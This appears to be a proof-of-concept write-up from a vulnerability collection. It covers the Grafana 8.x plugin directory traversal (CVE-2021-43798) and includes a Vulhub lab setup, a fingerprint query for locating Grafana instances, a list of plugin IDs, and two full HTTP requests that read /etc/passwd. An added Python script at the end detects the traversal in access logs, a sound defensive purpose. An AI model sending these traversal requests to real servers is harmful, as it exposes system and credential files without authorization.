Awesome-POC/Web应用漏洞/Grafana 8.x 插件模块目录穿越漏洞 CVE-2021-43798.md
2024-11-06 14:10:36 +08:00
# Grafana 8.x Plugin Module Directory Traversal Vulnerability CVE-2021-43798
## Vulnerability Description
Grafana is an open-source metrics analysis and visualization suite. In December 2021, Twitter user @j0v published a 0day he had discovered; an attacker can use this vulnerability to read arbitrary files on the server.
References:
- https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
- https://twitter.com/hacker_/status/1467880514489044993
- https://nosec.org/home/detail/4914.html
- https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw
- https://codeload.github.com/grafana/grafana/zip/refs/tags/v8.3.0 (source code)
## Affected Versions
```
Grafana 8.x
```
## Network Mapping
```
app="Grafana_Labs-公司产品"
```
## Environment Setup
Run the following command in Vulhub to start a Grafana 8.2.6 server:
```
docker compose up -d
```
After the service starts, visit `http://your-ip:3000` to see the login page; this vulnerability, however, requires no user privileges.
![](images/Grafana%208.x%20插件模块目录穿越漏洞%20CVE-2021-43798/image-20241105154049299.png)
## Vulnerability Reproduction
The vulnerability lies in the plugin module, which lets users access files under a plugin's directory. Because the file name is not restricted, an attacker can use `../` to traverse directories and read arbitrary files on the server.
Before exploiting the vulnerability, we first need to obtain the id of an installed plugin; common ones include:
```
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
```
Then send the following request to read an arbitrary file:
```
GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Grafana%208.x%20插件模块目录穿越漏洞%20CVE-2021-43798/image-20241105154903522.png)
You can also replace `alertlist` with another valid plugin id, for example `graph`:
```
GET /public/plugins/graph/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Grafana%208.x%20插件模块目录穿越漏洞%20CVE-2021-43798/image-20241105154832584.png)
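For the defender's side of the request pattern shown above, here is an added detection example (not part of the original page or of Grafana itself): it scans constructed access-log lines and flags requests to the `/public/plugins/<id>/` route whose path climbs out of the plugin directory, while leaving in-directory `..` segments and normal asset requests alone. The log format and the `SAMPLE_LOG` lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format), not taken from the original page.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2024:15:49:00 +0800] "GET /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1256
10.0.0.6 - - [05/Nov/2024:15:49:01 +0800] "GET /public/plugins/graph/module.js HTTP/1.1" 200 8812
10.0.0.6 - - [05/Nov/2024:15:49:02 +0800] "GET /public/plugins/graph/img/../icon.svg HTTP/1.1" 200 3301
10.0.0.8 - - [05/Nov/2024:15:49:03 +0800] "GET /login HTTP/1.1" 200 4110
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
PLUGIN_PREFIX = "/public/plugins/"


def is_plugin_traversal(path: str) -> bool:
    """True when a request hits the plugin asset route and its path escapes the plugin directory."""
    decoded = unquote(path)  # normalise percent-encoding before matching, as the server would
    if not decoded.startswith(PLUGIN_PREFIX):
        return False
    rest = decoded[len(PLUGIN_PREFIX):].split("?", 1)[0]
    segments = rest.split("/")
    # segments[0] is the plugin id; everything after it must stay below the plugin directory.
    depth = 0
    for seg in segments[1:]:
        if seg == "..":
            depth -= 1
            if depth < 0:  # climbed above <plugin id>/ -> traversal
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, decoded_path) for every log line that looks like plugin-route traversal."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_plugin_traversal(m.group("path")):
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, unquote(m.group("path"))))
    return hits


if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"plugin-route traversal from {ip}: {path}")
```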